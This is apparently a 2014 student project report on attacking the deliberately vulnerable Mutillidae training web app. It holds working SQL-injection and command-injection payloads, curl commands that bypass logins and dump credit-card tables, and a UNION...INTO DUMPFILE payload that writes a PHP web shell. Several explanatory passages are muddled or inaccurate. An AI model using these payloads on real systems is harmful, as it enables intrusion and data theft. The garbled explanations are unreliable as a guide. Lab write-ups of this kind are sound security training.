MP

MUTILLIDAE
PROJECT

SEPTEMBER 5, 2014

0 |Page

Table of Contents
INTRODUCTION

.
Page3
ATTACK VECTOR: BRUTE FORCE
..
Page 4
BRUTE FORCE

...
Page 4
DICTIONARY ATTACK
..
.
Page 4
BURP SUITE

Page 4
MUTILLIDAE EXAMPLE
.
.
Page 4
ATTACK VECTOR: COMMAND EXECUTION INJECTION (HARVESTING)
...
Page 10
COMMAND EXECUTION INJECTION (HARVESTING)
....
Page 10
COMMAND EXECUTION
.
..
Page 10
COMMAND INJECTION ATTACK .
....
Page 10
DATABASE INTERROGATION (DATA HARVESTING)
...
Page 10
MUTILLIDAE EXAMPLE
...
..
Page 10
HOW TO PERFORM SHELL AND COMMAND INJECTION
ATTACKS .
Page 11
ATTACK VECTOR: COMMAND EXECUTION INJECTION (LISTENER
ATTACKS) .
Page 14
PURPOSE

..
Page 14
1 |Page

ATTACK VECTOR: SQL INJECTION (SINGLE QUOTE PROBLEM)

.
Page 15
SQL INJECTION

.
Page 16
LOGIN WITHOUT A PASSWORD
..
Page 16
CURL

...
Page 17
MAN-IN-THE-MIDDLE-ATTACK
.
Page 17
COOKIE MANAGER
..
.
Page 17
MUTILLIDAE EXAMPLE
..
.
Page 17
ATTACK VECTOR: SQL INJECTION (UNION ATTACK DISPLAY
SENSITIVE INFORMATION)
Page 19
UNION ATTACKS

.
Page 19
WEAK PHP PROGRAMMING
..
Page 19
MUTILLIDAE EXAMPLE
..
.
Page 19
ATTACK VECTOR: SQL INJECTION (UNION ATTACK/CREATE
COMMAND EXECUTION
PROGRAM) ..
...
Page 20
COMMAND EXECUTION
..
.
Page 20
COMMAND EXECUTION LISTENER
....
20

Page

2 |Page

NETCAT
.
...
Page 20
MUTILLIDAE EXAMPLE
..
.
Page 20
ATTACK VECTOR: SQL INJECTION (UNION ATTACK / CREATE UPLOAD
PROGRAM) ....
Page 21
UNION ATTACK

.....
Page 21
PHP UPLOAD BACKDOOR
....
Page 21
C99.PHP ROOT KIT

...
Page 21
MUTILLIDAE EXAMPLE
....
.
Page 21
COUNTER MEASURE
.....
.
Page 22
ATTACK VECTOR: FILE UPLOAD
.....
Page 22
ATTACK UPLOAD VECTOR
......
Page 23
PAYLOAD ..
.....
Page 23
CREATING A
PAYLOAD
....
Page 23
EXECUTING A PAYLOAD ..
....
Page 23
CONNECTING A PAYLOAD BACK TO A MACHINE
......
Page 23
C99.PHP COMPARE AND
CONTRAST....
Page 24
C99.PHP MALICIOUS FUNCTIONALITY
......

Page 24
3 |Page

MUTILLIDAE EXAMPLE
....
.
Page 24
COUNTER MEASURE ..
....
Page 24
ATTACK VECTOR: CROSS SITE SCRIPTING ..
....
Page25
CROSS SITE SCRIPTING (XSS) ..
.....
Page 25
REFLECTIVE CROSS SITE SCRIPTING ..
...
Page 25
PERSISTENT CROSS SITE SCRIPTING ..
.....

Page 25

TESTING WEBPAGES FOR VULNERBILITY TO CROSS SITE

SCRIPTING ......
Page 25
USING IFRAME TO POINT TO A MALICIOUS WEBSITE
....
Page 25
PLANTING A COOKIE HARVESTER INTO A BLOG TO GAIN A
VICTIMS COOKIE
INFORMATION
.....

Page 26
MUTILLIDAE EXAMPLE
....
.
Page 26
COUNTER MEASURE .
.....
Page 27
CONCLUSION ..
...
Page 28
THE FUTURE OF ATTACK VECTORS AND GOING FORWARD
COUNTER MEASURES ...
Page28
JAVASCRIPTING AND CGI INPUT VALIDATION
..
Page 28
ONGOING SECURITY TESTING
.....
Page 28
PROJECT MEMBERS

..
PAGE 29

Introduction
4 |Page

Penetration test is an attack on a computer system with the

intention of finding security weaknesses, potentially gaining
access to it, its functionality and data. Mutillidae offers a free open
source, deliberately vulnerable web-application providing a target
for web-security. Mutillidae has over 35 vulnerabilities and
challenges and contains at least one vulnerability for each of the
OWASP Top Ten 2007 and 2010. Some of the features include, SSL
striping, bubble-hints to help point out vulnerable locations
(Bubble-hints automatically give more information as hint level
incremented) and Authentication bypass. Mutiilidae provides data
capture page and stores captured data in database and file.

Mutillidae was created by Adrian Crenshaw as a web pen testing

target for vulnerabilities. It began as a version 1.x and later
redesign and develop into Mutillidae 2.x by Jeremy Druin.
Mutillidae was develop to aid in the understanding and
appreciating the consequences of the vulnerabilities. It helps
security instructor avoid having to create custom web application
for training and useful to evaluate vendor products against a
target with specified, disclosed vulnerabilities. Vulnerabilities need
to be identified by both the penetration tester and the
vulnerability scanner. This allows the tester to find the
vulnerabilities and fix them before the attacker does. A few reason
why it exist, it allows the tester to find holes in a critical computer
system before it goes online (which is good security practice) and
it gives the IT department at the targeted company and change to
respond to an attack.

5 |Page

Attack Vector
Brute Force
Brute force (also known as brute force cracking) is a trial and error
method used by application programs to decode encrypted data
such as passwords or Data Encryption Standard (DES) keys,
through exhaustive effort (using brute force) rather than
employing intellectual strategies. It consists of systematically
checking all possible keys or passwords until the correct one is
found. In the worst case, this would involve traversing the entire
search space.
Dictionary Attack
A method used to break security systems, specifically passwordbased security systems, in which the attacker systematically tests
all possible passwords beginning with words that have a higher
possibility of being used, such as names and places. The word
"dictionary" refers to the attacker exhausting all of the words in a
dictionary in an attempt to discover the password. Dictionary
attacks are typically done with software instead of an individual
manually trying each password.
Burp Suite
Burp Suite is an integrated platform for performing security
testing of web applications. Its various tools work seamlessly
together to support the entire testing process, from initial
mapping and analysis of an application's attack surface, through
to finding and exploiting security vulnerabilities.

6 |Page

Mutillidae Example:
A great majority of web applications provide a way for users to
authenticate themselves. If an attacker has knowledge of a user's
identity it's possible to create protected areas or, more generally,
to have the application behave differently upon the logon of
different users. In general, there are several methods for a user to
authenticate to a system. A dictionary file can be tuned and
compiled to cover words probably used by the owner of the
account that a malicious user is going to attack. Burp Suite will be
used to intercept traffic and configure Burp Suite to launch our
attack. Using Burp Suite, we can change the values of username
and password with each request.
After finding your target, open Mutillidae, then select View
Someones Blog

You will see a list of Possible Users, select Please Choose Author

7 |Page

By right clicking on white background, you can view page source

<Ctrl> and <f> will allow your to search the source code.
Type admin then enter
You will then insert the IP of the target in the following the parsing
source code

curl -L "http://xxx.xxx.xxx.xxx/mutillidae/index.php?
page=view-someones-blog.php" 2>/dev/null | grep
-i \"admin\" | sed 's/"//g' | awk 'BEGIN{FS=">"}{for (i=1;
i<=NF; i++) print $i}' | grep -v value | sed s'/<\/option//g'

Testing the login.php, then copy the login.php error

8 |Page

Open terminal and gedit & to paste error, the <ctrl> and <v> to
display message.
From here, you will then view login.php again and right click white
background to analyze login.php source.
You will notice the naming convention of the username and
password and the value of the submit button.

9 |Page

From the Firefox dropdown, select preference and then advance,

network, and settings

Connection Settings, Click on Manual proxy configurations, Type

"127.0.0.1" in the HTTP Proxy Text Box, Type "8080" in the Port
Text Box, Check Use the proxy server for all protocols, Click OK,
Click Close.

10 | P a g e

Start Burp Suite, Applications --> BackTrack --> Vulnerability

Assessment --> Web Application Assessment ---> Web
Vulnerability Scanner --> burpsuite
Configure proxy

Turn on intercept

11 | P a g e

Try Logging in and Verifying Burp Suite Results

12 | P a g e

Attack Vector
Command Execution Injection (Harvesting)

Command Execution
One of the most critical vulnerabilities that a penetration
tester can come across in a web application penetration test
is to find an application that it will allow him to execute
system commands.
Command Injection Attack
A command injection is an attack method in which a hacker
alters dynamically generated content on a Web page by
entering HTML code into an input mechanism, such as a
form field that lacks effective validation constraints. A
malevolent hacker (also known as a cracker) can exploit that
vulnerability to gain unauthorized access to data or network
resources. When users visit an affected Web page, their
browsers interpret the code, which may cause malicious
commands to execute in the users' computers and across
their networks.
Database Interrogation (Data Harvesting)
When you interrogate a customer database, you use the
software to ask carefully defined questions. The procedures
vary depending on your software, but the basic logic applies
to any database. Enter one or more items, called fields or
field names, and the values you want to output.
Mutillidae Example:

13 | P a g e

Shell injection, also known as command injection (the terms are

used interchangeably here), while not the most frequently talked
about or discovered vulnerability, is nonetheless one of the most
critical.
Oftentimes, web applications need to take advantage of
underlying programs or applications to complete some
functionality. This may be as simple as sending an email using the
UNIX send mail program, or as complicated as running custom Perl
and c++ programs. From a development point of view, this is an
excellent way to reduce the development time of an application.
However, if data is passed to these programs via a user interface,
then an attacker may be able to inject shell commands into these
backend programs, potentially leading to compromise.
To understand how the most basic shell injection might work,
imagine a simple case. A custom script is needed to display file
contents to users, but the development team doesn't want to
spend time writing a procedure to read the files. Instead, they
decide to allow users to specify a file, then use the UNIX command
cat to display the results. The code to accomplish this might be
something like this in PHP:
<?php
echo shell_exec('cat '.$_GET['filename']);
?>
So far, so good. Now the script can be called with various GET
parameters to output different files to the user. If we add new files
to the directory, the application automatically knows how to read
and output them, no matter the output. We can see this with a
simple example to understand how the program should work.
Assume we have a file in the same directory which a user may
want to output. Let's call it my_great_content.txt. It contains some
test text like the following:

14 | P a g e

A user comes to the page with the following URL:

The PHP page shows them the content just as the user expected.
For your average user, the page works as expected, and the
development team only had to write one line of code.
Unfortunately, as you may have guessed, the code is not secure
and is vulnerable to a shell command injection attack. If an
attacker comes, they may append a semicolon (;) and another
UNIX command to the filename specified in the URL parameter.
Perhaps they want to start by listing what files are in the directory:
The page still comes up with the file contents, but since I injected
a command (ls), it doesn't end there. The command line continues
to execute the following command and shows some special
information.
This example code actually offers numerous opportunities for an
attacker, including directory traversals. As a quick example,
providing a file name like ../../etc/passwd, would have the cat
command print out the list of users on the server. Even if shell
injection were prevented by limiting input to the cat function, this
issue would still need to be addressed.
How to Perform Shell and Command Injection Attacks
Assuming some analysis has found a website function which is
likely to be vulnerable to shell injection there are a variety of ways
to inject shell commands.
Assume for a moment that you have found the previous examples
page, which takes as an argument a filename as input and
executes the shell command "cat" against that file. In the previous
example, a semicolon was used to separate out one command
form another, to indicate that after the cat command completed,
another function should be called in the same line. It is reasonable
to assume that a more advanced developer might have filtered
out some forms of shell injection, such as by removing semicolons,
15 | P a g e

rendering the previous attack ineffective. There are a number of

ways to string shell commands together to create new commands.
Here are the common operators you can use, as well as examples
of how they might be used in an attack:
Redirection Operators
Examples: <, >>, >
These operators redirect either input or output somewhere else on
the server. < will make whatever comes after it standard input.
Replacing the filename with < filename will not change the output,
but could be used to avoid some filters. > redirects command
output, and can be used to modify files on the server, or create
new ones altogether. Combined with the cat command, it could
easily be used to add unix users to the system, or deface the
website. Finally, >> appends text to a file and is not much
different from the original output modifier, but again can be used
to avoid some simplistic detection schemes.
Pipes
Examples: |
Pipes allow the user to chain multiple commands. It will redirect
the output of one command into the next. So you can run
unlimited commands by chaining them with multiple pipes, such
as cat file1 | grep "string".
Inline commands
Examples: ;, $
This is the original example. Putting a semicolon asks the
command line to execute everything before the semicolon, then
execute everything else as if on a fresh command line.
Logical Operators
Examples: $, &&, ||

16 | P a g e

These operators perform some logical operation against the data

before and after them on the command line.
Common Injection Patterns & Results
Here are the expected results from a number of common injection
patterns (appending the below to a given input string, assuming
all quotes are correctly paired:
`shell_command` - executes the command
$(shell_command) - executes the command
| shell_command - executes the command and returns the
output of the command
|| shell_command - executes the command and returns the
output of the command
; shell_command - executes the command and returns the
output of the command
&& shell_command executes the command and returns the
output of the command
> target_file - overwrites the target file with the output of the
previous command
>> target_file - appends the target file with the output of the
previous command
< target_file - send contents of target_file to the previous
command
- operator - Add additional operations to target command
These examples are only scratching the surface of possible
command injection vectors. The full breadth of attack possibilities
is dependent upon the underlying function calls. For instance, if an
underlying function is using a shell program such as awk, many
more attack possibilities arise than laid out here.

17 | P a g e

Finally, command injection can be more subtle than finding

applications which directly call underlying operating system
functions. If it is possible to inject code, say PHP code, then you
can also perform command injections. Assume you find an
application with a PUT vulnerability on a site which is PHP enabled.
An attacker could simply upload a PHP file with a single line to
have full access to a shell:
<?php
echo shell_exec('cat '.$_GET['command']);
?>
Thus, it should be noted that many types of attacks, including SQL
Injection, have shell injection as an end primary goal to gaining
control of the server.

Attack Vector
Listener Attacks
IGMP snooping is the process of listening to Internet Group
Management Protocol (IGMP) network traffic. The feature allows a
network switch to listen in on the IGMP conversation between
hosts and routers. By listening to these conversations the switch
maintains a map of which links need which IP multicast streams.

18 | P a g e

Multicasts may be filtered from the links which do not need them
and thus controls which ports receive specific multicast traffic.

Purpose
A switch will, by default, flood multicast traffic to all the ports in a
broadcast domain (or the VLAN equivalent). Multicast can cause
unnecessary load on host devices by requiring them to process
packets they have not solicited. When purposefully exploited this
is known as one variation of a denial-of-service attack. IGMP
snooping is designed to prevent hosts on a local network from
receiving traffic for a multicast group they have not explicitly
joined. It provides switches with a mechanism to prune multicast
traffic from links that do not contain a multicast listener (an IGMP
client).
IGMP snooping allows a switch to only forward multicast traffic to
the links that have solicited them. Essentially, IGMP snooping is a
layer 2 optimization for the layer 3 IGMP. IGMP snooping takes
place internally on switches and is not a protocol feature.
Snooping is therefore especially useful for bandwidth-intensive IP
multicast applications such as IPTV.

19 | P a g e

Attack Vector

SQL Injection (Single Quote Problem)

The

Single Quote Problem is that the single quote is a reserved SQL

character that breaks the below query by placing it in the Name
textbox.

The mere fact that the query produces an error means there is a
strong possibility that the backend program is susceptible to a SQL
Injection.

Logging in without a password by entering the string ' or

1=1--(with a space after the --) allows you to bypass the password
authentication.

20 | P a g e

SQL Injection
SQL injection is a code injection technique, used to attack datadriven applications, in which malicious SQL statements are
inserted into an entry field for execution. SQL injection must
exploit a security vulnerability in an application's software, for
example, when user input is either incorrectly filtered for string
literal escape characters embedded in SQL statements or user
input is not strongly typed and unexpectedly executed. SQL
injection is mostly known as an attack vector for websites but can
be used to attack any type of SQL database. The single quote
allows the attackers to get the information they are attempting to
acquire to be kicked back to them. You can test for this by
changing the password box to plain text and entering a single
quote into the password box to see what errors you obtain.
Depending on what happens will determine how you can exploit
the situation. A straightforward, though error-prone, way to
prevent injections is to escape characters that have a special
meaning in SQL. The manual for an SQL DBMS explains which
characters have a special meaning, which allows creating a
comprehensive blacklist of characters that need translation. For
instance, every occurrence of a single quote (') in a parameter
must be replaced by two single quotes ('') to form a valid SQL
string literal.
SQL injection (also known as SQL fishing) is a technique often
used to attack data driven applications. This is done by including
portions of SQL statements in an entry field in an attempt to get
the website to pass a newly formed rogue SQL command to the
database (e.g., dump the database contents to the attacker). SQL
injection is a code injection technique that exploits a security
vulnerability in an application's software. The vulnerability
happens when user input is either incorrectly filtered for string
literal escape characters embedded in SQL statements or user
21 | P a g e

input is not strongly typed and unexpectedly executed. SQL

injection is mostly known as an attack vector for websites but can
be used to attack any type of SQL database.
cURL
cURL stands for "Client URL Request Library". This is a command
line tool for getting or sending files using URL syntax. It supports a
range of common Internet protocols, currently including HTTP,
HTTPS, FTP, FTPS, SCP, SFTP, TFTP, LDAP, LDAPS, DICT, TELNET,
FILE, IMAP, POP3, SMTP and RTSP. The following curl statement
provides the blueprint to automate SQL Injection attempts. curl -b
crack_cookies.txt -c crack_cookies.txt --user-agent "Mozilla/4.0
(compatible; MSIE 5.01; Windows NT 5.0)" --data "username=
%27+or+1%3D1--+&password=&login-php-submit-button=Login"
--location "http://xxx.xxx.xxx.xxx/mutillidae/index.php?
page=login.php" > login1.txt.
Man-in-the-middle attack
The man-in-the-middle attack in cryptography and computer
security is a form of active eavesdropping in which the attacker
makes independent connections with the victims and relays
messages between them, making them believe that they are
talking directly to each other over a private connection, when in
fact the entire conversation is controlled by the attacker. The
attacker must be able to intercept all messages going between
the two victims and inject new ones, which is straightforward in
many circumstances.
Cookies manager
Cookies manager to view, edit and create new cookies. It also
shows extra information about cookies, allows edit multiple
cookies at once and backup/restore them. When Burp suite is used
as a proxy server and a web browser uses this proxy server, it is
possible to have control of all traffic that is exchanged between
the web browser and web servers.
Mutillidae Example
22 | P a g e

Burp makes it possible to manipulate data before it is sent to the

web server.
This curl statement provides the blueprint to automate SQL
Injection attempts. curl -b crack_cookies.txt -c crack_cookies.txt
--user-agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT
5.0)" --data "username=%27+or+1%3D1-+&password=&login-php-submit-button=Login" --location
"http://xxx.xxx.xxx.xxx/mutillidae/index.php?page=login.php" >
login1.txt.

The crack_cookies.txt file contains the session cookies including

the PHP session ID (PHPSESSID) and the UID of the user admin.
What is happening is that Burp Suite is obtaining the information
from someones session by acting as a proxy server and
intercepting the traffic going into the website before it reaches its

destination and kicks the information back to the hacker. When

passing the SQL injection to cURL, it allows you to obtain login
information of users and access the websites as users on the
targeted website. The attack outputs the session information
obtained by cookie manager into text files the can be obtained by
the hacker. This information can be used to access websites as the
user without the users knowledge. Some countermeasures for
SQL injections could be to Use language-specific libraries that
avoid problems due to shell commands, Validate the data provided
to prevent any malicious content, Structure requests so that all
23 | P a g e

supplied parameters are treated as data, rather than potentially

executable content and enact J2EE environments to allow the use
of the Java sandbox, which can prevent the execution of system
commands. Some countermeasures for cookie managers would be
Do not store plain text or weakly encrypted password in a Cookie,
Implement cookies timeout, Cookies authentication credentials
should be associated with an IP address and Make logout functions
available.

Attack Vector
SQL Injection (Union Attack Display Sensitive
Information)
A SQL Union attack when added to an existing statement is used
to retrieve information from the specified table. It also combines
results from multiple statements into one result set. In my
research I have found that PHP programming is considered a weak
programming because it has many interchangeable integers and
strings. This makes it weak because it means that there are very
few rules and that in turn leaves it open for more possible and
easier attacks.
Union Attack
An attacker can use a union attack to display the database table
structure by inputting union select null as many times as
needed to discover exactly how many columns are in the
database. This is a useful tool because then it will be easier to
know exactly where to look for the information you are requesting.
A counter measure that can be used to combat this type of inquiry
would in my opinion be making sure that there are extensive
24 | P a g e

system logs in place. I also feel that implicit deny would be

effective because it blocks out any traffic that is not specifically
accepted.
Weak PHP Programming
PHP uses strings and integers interchangeably so there are less
rules. Therefore, PHP is considered a weakly typed language. PHP
is also dynamically typed because the rules are applied at run
time instead of at compile time since PHP is not compiled and
instead interpreted at run time.
Mutillidae Example
An attacker can use the Union attack to display sensitive
information by inputting union select
ccid,ccnumber,ccv,expiration,null from credit_cards -- .
This will take the requested information and input it into the
results page. A good countermeasure for this type of attack would
be the use of stored procedures. This would force the injection to
go through a script that can then deny the attacker access.
By inputting curl -b crack_cookies.txt -c crack_cookies.txt
--user-agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows
NT 5.0)" --data "page=user-info.php&username=
%27+union+select+ccid%2Cccnumber%2Cccv
%2Cexpiration%2Cnull+from+credit_cards+-+&password=&user-info-php-submitbutton=View+Account+Details" --location
"http://xxx.xxx.xxx.xxx/mutillidae/index.php" | grep -i
"Username=" | awk 'BEGIN{FS="<"}{for (i=1; i<=NF; i++)
print $i}' | awk -F\> '{print $2}' the selected data from the
union attack is easily viewed with cURL. I believe that the most
effective procedure for this would also be a stored procedure. With
a stored procedure the attacker would have trouble even getting

25 | P a g e

to this point, let alone going any further to retrieve this

information.

Attack Vector
SQL Injection (Union Attack / Create Command
Execution Program)
Union Attack
A SQL Union attack as explained above is when added to an
existing statement is used to retrieve information from the
specified table. It also combines results from multiple statements
into one result set.
Command Execution
Command execution takes commands and uses said commands to
Dump files and information into separate files.
Command Execution Listener
A command execution listener is a listener to the execution of
commands. This listener will be notified if a command is about to
execute, and when that execution completes. It is not possible for
the listener to prevent the execution, only to respond to it in some
way.
Netcat
Netcat is designed to be a dependable back-end that can be used
directly or easily driven by other programs and scripts
Mutillidae Example
By inputting ' union select null,null,null,null,'<form
action="" method="post" enctype="application/x-wwwform-urlencoded"><input type="text" name="CMD"
size="50"><input type="submit" value="Execute
26 | P a g e

Command" /></form><?php echo "<pre>";echo

shell_exec($_REQUEST["CMD"]);echo "</pre>"; ?>' INTO
DUMPFILE
'/var/www/html/mutillidae/execute_command.php' The
attacker can create a PHP command execution program. Once
again I feel a stored procedure would be the best counter
measure. The reason I feel this would be effective is there would
be an active log of all login attempts.
By inputting select * from accounts where username RLIKE
'^[0-9]' union select ccid,ccnumber,ccv,expiration,null from
credit_cards INTO OUTFILE '/tmp/CCN.csv' FIELDS
TERMINATED BY ',' OPTIONALLY ENCLOSED BY '"' LINES
TERMINATED by '\n'; and then inputting \! Cat
/tmp/CCN.csv you will take the all of the information and dump
it into a separate file. As far as a good countermeasure I really am
unsure what would be the most effective counter measure for this
type of attack.

Attack Vector
SQL Injection (Union Attack / Create Upload Program)

Union Attack
Union attack is a specific flavor of SQL injection. It is arguably the most
destructive and allows the attacker to extract extremely large chunks of
data in a very short amount of time. Union attacks are very quick and

require very few requests, making it more difficult to detect

abnormal activity.
PHP Upload Backdoor
The PHP upload backdoor shell is a malicious piece of code that
can be uploaded to a site to gain access to files stored on that
site. Once it is uploaded, the hacker can use it to edit, delete, or
download any files on the site, or upload their own.
C99.php Root Kit
27 | P a g e

The c99.php utility is a type of web front-in backdoor/rootkit that

allows for anybody to do the following: List files and directories;
search files and directories with regular expresses; executing shell
commands; brute forcing ftp passwords; establishing netcat
sessions, database reconnaissance and modification, and much
more.
Mutillidae Example
Identifying the SQL injection is the key step, and it takes a lot of
skill and experience to identify the injection point. By analyzing
the application properly, the possible injection points can be
identified. Like in the screenshot shown below, the USER ID field
could be vulnerable to SQL injection. It takes an integer as input
and displays the First Name and Surname associated with the User
ID provided. Take:MySQL helps to explore the SQL injection further.
Lets dig further and try to enumerate to try to guess the backend
query, number of columns used in the query, database name,
MySQL version etc. Our guess about the backend query from the
front end is something like: MySQL> select first name, last name
from users where user_id=1 ; But it is just a wild guess. Well need
proper enumeration of the backend query for which MySQL helps
us. MySQL gives us ORDER BY. UNION combines the results of 2
SELECT queries. From our previous ORDER BY operation we know
that the query contains 2 columns. So one SELECT query is the
backend query on which we have no control but we can introduce
UNION with another SELECT query designed by us and will display
the result which will be union of the results of 2 queries. The final
query at the backend would be something like this after our
injection using UNION SELECT. Make sure since the columns used
in the main query is 2, in UNION SELECT we should use 2 columns
only since both SELECT queries should have same number of
columns: MySQL> select first name, last name from users where
user_id= union select 1,2.
Counter Measures:
28 | P a g e

Counter measures for Union Attacks, php upload backdoor, and

c99.php root kits are to implement secure coding. Implementing a
combination of Network, Host, and Application Intrusion Detection
Systems to monitor for attacks. Also a number of firewalls to block
attacks. Probing for vulnerabilities.

Attack Vector
File Upload
Attack Vector
An Upload Attack Vector exists when a website application
provides the ability to upload files. The approach used to assault a
computer system or network. A fancy way of saying "method or
type of attack," the term may refer to a variety of vulnerabilities.
For example, an operating system or Web browser may have a
flaw that is exploited by a Web site. Human shortcomings are also
used to engineer attack vectors. For example, a novice user may
open an e-mail attachment that contains a virus, and most
everyone can be persuaded at least once in their life to reveal a
password for some seemingly relevant reason.
Payload
On the Internet, a payload is either: The essential data that is
being carried within a packet or other transmission unit.
Instead of hard coding the payload in the exploit code, set the
payload option in the setg (set global) and then run the save
command. You can develop your module without configuring the
payload again and again. Off course if you need a separate
payload for any other module, just set it like normally using the
set command and it will override the global one. This is more
flexible than hard coding the payload within the exploit code.
Creating a Payload
Return-oriented programming is an advanced version of a stack
smashing attack. Generally, these types of attacks arise when an
adversary manipulates the call stack by taking advantage of a bug
in the program, often a buffer overrun. In a buffer overrun, a
29 | P a g e

function that does not perform proper bounds checking before

storing user-provided data into memory will accept more input
data than it can store properly. If the data is being written onto the
stack, the excess data may overflow the space allocated to the
function's variables (e.g., "locals" in the stack diagram to the
right) and overwrite the return address. This address will later be
used by the function to redirect control flow back to the caller. If it
has been overwritten, control flow will be diverted to the location
specified by the new return address. In a standard buffer overrun
attack, the attacker would simply write attack code (the
"payload") onto the stack and then overwrite the return address
with the location of these newly written instructions.
Execute the Payload
A remote authenticated user can execute arbitrary code on the
target system. A remote authenticated user with editor privileges
can upload PHP files containing arbitrary code, which can then be
executed with the privilege of the web service. The vulnerability
resides in the file upload component and the File Abstraction
Layer.
Connecting the Payload Back to the Machine
More recent PHP versions have register_globals set to off by
default; however some users will change the default setting for
applications that require it. This register can be set to "on" or "off"
either in a php.ini file or in a .htaccess file. The variable should be
properly initialized if this register is set to "on." Administrators
who are unsure should question application developers who insist
on using register_globals. It is an absolute must to sanitize all user
input before processing it. As far as possible, avoid using shell
commands. However, if they are required, ensure that only filtered
data is used to construct the string to be executed and make sure
to escape the output.
C99.php Compare and Contrast
In many ways it can be considered the web equivalent of the
rootkits that successful attackers often download. In other ways it
is the malware equivalent of PHPShell itself. c99 is often one of the
utility programs that is either downloaded if a web server is
vulnerable due to being misconfigured, or can be used in a remote
30 | P a g e

file include attack to try and execute shell commands on a

vulnerable server.
C99.php Malicious Functionality

The c99 PHP utility provides functionality for listing files, bruteforcing FTP passwords, updating itself, executing shell commands
and PHP code. It also provides for connecting to MySQL databases,
and initiating a connect-back shell session.
Mutillidae Example
File Upload Flaw allows a remote user can upload arbitrary files to execute
arbitrary code on the target system.

31 | P a g e

Counter Measure
Do not rely on user inputs, use hash-tables, white-list filter,
escape commands, validate file type-format, run AV on
uploaded files, segregate uploads

Attack Vector
Cross Site Scripting
Cross Site Scripting
A form of attack against web applications is called Cross Site
Scripting, also known as XSS. In a cross-site scripting attack, data
is entered into an application which is later written back to
another user. If the application has not taken care to validate the
data correctly, it may simply echo the input back allowing the
insertion of JavaScript code into the HTML page.
Reflective Cross Site Scripting
A reflected cross site scripting attack, the attack is in the request
itself (frequently the URL) and the vulnerability occurs when the
server inserts the attack in the response verbatim or incorrectly
escaped or sanitized. The victim triggers the attack by browsing to
a malicious URL created by the attacker.
Persistent Cross Site Scripting
A persistent cross-site scripting vulnerability is when the attacker
provides malicious data to the web application and is stored
permanently on a database or some other similar storage. The
malicious data is later accessed and executed by the victims
without it being filtered or sanitized. This variant of cross-site
32 | P a g e

scripting vulnerability has the largest impact of all when compared

to other XSS.
Testing if a webpage is vulnerable to Cross Site Scripting
The first step in this process is to get your toolkit in order (Web
proxies for manual testing). Youre going to need to intercept the
HTTP requests your Web browser makes before they get sent, and
then modify them to inject your XSS test. Intercepting the client
GET and POST requests is extremely important. This will let you
bypass any sort of client-side JavaScript input validation code that
may have been pushed down. Map out the site and its
functionality by create some simple data flow diagrams that
describe the pages on the site and their purposes. List out all of
the query string parameters, cookie values, custom HTTP headers,
POST data values, and other forms of user-supplied input passed.
Look at the HTML output and find where your input made it in.
Using an iframe to point to a malicious website
A malicious site can use an iframe to exploit a vulnerable site via
CSRF. In a typical CSRF attack, the browser is tricked by a
malicious site to submit a request to a vulnerable site. The
browser will include the cookies for that site, thus the request is
authenticated from the point of view of the vulnerable site. While
there is a number of ways to trigger GET-request, cross site POST
request are usually created by submitting a form. While JavaScript
can be used to trigger the submission automatically, it cannot be
used to hide the result page. So on a simple POST-based CSRFattack the user will be warned after the fact. The trick is to put the
malicious auto-submitting form into an invisible iframe. Therefore
the user will not see the webpage showing the submission result.
Planting a cookie harvester into a blog to gain a victims
cookie information
An attacker can release a Trojan in in order to gain control over a
computers. This Trojans payload contains in dropping a Backdoor
33 | P a g e

(to open a port), changing the homepage of the browser and

placing a malicious cookie in the browsers cookie area. When
the unsuspecting user launches the browser, then it automatically
connects to the new homepage (namely the attackers website).
Once this is done, the malicious cookie is being read and the
attacker becomes aware of the fact that the computer is infected.
By knowing this, it becomes a piece of cake to take over the
computer using some exploits or the open port.
Mutillidae Example

Persistent Cross Site Scripting Injection

Man-in-the-middle and Persistent

Covert Cross Site Scripting
Injection

34 | P a g e

Persistent Covert Cross Site Scripting Injection with Metasploit

Counter Measure
The best counter measure approach is always to probe for
vulnerabilities, intrusion detection systems, and blocking attacks
using firewalls. The simplest form of XSS protection is to pass all
external data through a filter.

35 | P a g e

Conclusion
The Future of Attack Vectors and going forward counter
measure
Cybercriminals tend to focus where the weak spots are and use a
technique until it becomes less effective, and then move on to the
next frontier. Protecting data in a world where systems are
changing rapidly, and information flows freely, requires a
coordinated ecosystem of security technologies. Forward going
counter measures must focus on all the key components
enforcement of use policies, data encryption, secure access to
corporate networks, productivity and content filtering,
vulnerability and patch management, and of course threat and
malware protection.
Java Scripting and CGI input validation
When you submit a form to a CGI program that resides on the
server, it is usually programmed to do its own check for errors. If it
finds any it sends the page back to the reader who then has to reenter some data, before submitting again. A JavaScript check is
useful because it stops the form from being submitted if there is a
problem, saving lots of time for your readers.
36 | P a g e

The CGI script is still more reliable, as it always works regardless

of whether JavaScript is enabled on the client-side or not; but
having this extra safety barrier is a nice thing to have in place. It
makes your page much more user-friendly, and takes out the
frustration of having to fill out the same form repeatedly. It's also
very precise, as you can point out the exact field where there's a
problem.
Ongoing Security Testing
Networks are required to be safe, interconnected, and constantly
available in order to conduct business in our global economy.
Without regular vulnerability audits and management, network
infrastructure can introduce significant risks to an organization
and managing the risk associated with ever-changing businesscritical systems is becoming increasingly challenging.

PROJECT MEMBERS
PROJECT MANAGER
Cyuba Thomas
DeMarc

Nathan Green

Gradney

Preston Mendez

Maurice Smith
37 | P a g e

38 | P a g e